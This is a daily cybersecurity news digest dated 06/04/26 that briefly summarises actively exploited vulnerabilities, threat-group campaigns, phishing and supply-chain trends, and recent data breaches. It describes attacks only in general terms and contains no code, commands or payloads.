Cybersecurity Newsfeed - 06/04/26
Daily cybersecurity news covering vulnerabilities, adversaries, trends, breaches, and other notable security developments.
Cybersecurity Newsfeed
📅 06/04/26
🛡️ Vulnerabilities
Fortinet FortiClient EMS (CVE-2026-35616): Threat actors are actively exploiting a critical flaw in FortiClient Endpoint Management Server. The vulnerability allows unauthenticated attackers to execute arbitrary code via crafted packets. Fortinet has released patches for versions 7.0 and 7.2. More info
React2Shell Automated Exploitation: Attackers are using the “React2Shell” exploit to target web applications with exposed environmental files or misconfigured debug modes. This automated campaign deploys web shells to exfiltrate API keys and database passwords. More info
TrueConf Zero-Day in Asia: A zero-day vulnerability in TrueConf video conferencing software has been exploited to target Asian government entities. The flaw allows remote code execution and has been used for espionage and document theft. More info
🎯 Adversaries
Mustang Panda (TA416) Targets Europe: The China-linked group is targeting European government entities with phishing lures related to diplomacy. They are deploying updated versions of PlugX and Hodur malware for persistent surveillance. More info
Axios Maintainer Hijacked: The maintainer of the “axios” npm package was targeted by a fake Microsoft Teams error fix. The social engineering attack led to account takeover, posing a massive supply chain risk to millions of downstream apps. More info
UNC1069 Targets Node.js Developers: Using fake LinkedIn and Slack recruiter profiles, the UNC1069 group is targeting Node.js maintainers to deliver malware and gain access to critical open-source repositories. More info
TeamPCP Hacker Infighting: A new group, TeamPCP, has emerged, focusing on attacking other threat actors to disrupt operations and steal tools, creating a volatile “hacker vs. hacker” ecosystem. More info
📈 Trends
37-Fold Surge in Device Code Phishing: New phishing kits exploiting the OAuth 2.0 device authorization flow are spreading. These attacks bypass traditional filters by using legitimate Microsoft login pages to grant hackers persistent cloud access. More info
36 Malicious npm Packages Identified: A surge in supply chain attacks has been noted with 36 packages using typosquatting to exfiltrate SSH keys and environment variables from developer environments. More info
LinkedIn Extension Scanning: LinkedIn has been caught scanning users’ browsers for over 6,000 Chrome extensions, raising privacy concerns regarding the harvesting of telemetry data without explicit consent. More info
Multi-Extortion Ransomware Evolution: Ransomware tactics have shifted toward multi-extortion, combining encryption with DDoS and direct harassment of victims’ clients to increase pressure for payment. More info
CrystalX RAT (MaaS): A new Malware-as-a-Service offering, CrystalX RAT, combines spyware and info-stealing capabilities with advanced obfuscation to evade antivirus detection on Windows systems. More info
Fake ChatGPT Ad Blocker: A malicious Chrome extension posing as an AI ad blocker has been found spying on users, capturing browsing history and credentials via script injection. More info
Virtual RAM Risks: As RAM prices rise, the use of Virtual RAM is increasing. Beyond performance bottlenecks, it expands the footprint of sensitive data on permanent storage, complicating forensic privacy. More info
💥 Breaches & Leaks
Mercor AI 4TB Data Breach: AI recruiting firm Mercor suffered a massive breach due to an unsecured database. Stolen data includes resumes, government IDs, and interview videos of thousands of job seekers. More info
Qilin Ransomware Hits Die Linke: The German political party “Die Linke” confirmed a data breach following a Qilin attack. Sensitive documents were exfiltrated during a critical political period. More info
Hims & Hers via Zendesk: Telehealth provider Hims & Hers warned customers of a breach after attackers gained access to Zendesk support tickets containing personal health descriptions. More info
Source Code Leak Epidemic: Recent high-profile leaks highlight a lack of supply chain oversight, with proprietary algorithms and hardcoded credentials being exposed due to misconfigured cloud storage. More info
📚 Others
Microsoft Exchange Online Outages: Persistent configuration errors have left users unable to sync mailboxes, highlighting the risks of total reliance on centralized cloud infrastructure. More info
Insider Extortion Plot: A former employee admitted to locking thousands of Windows devices belonging to his former employer after termination, highlighting the need for immediate account deprovisioning. More info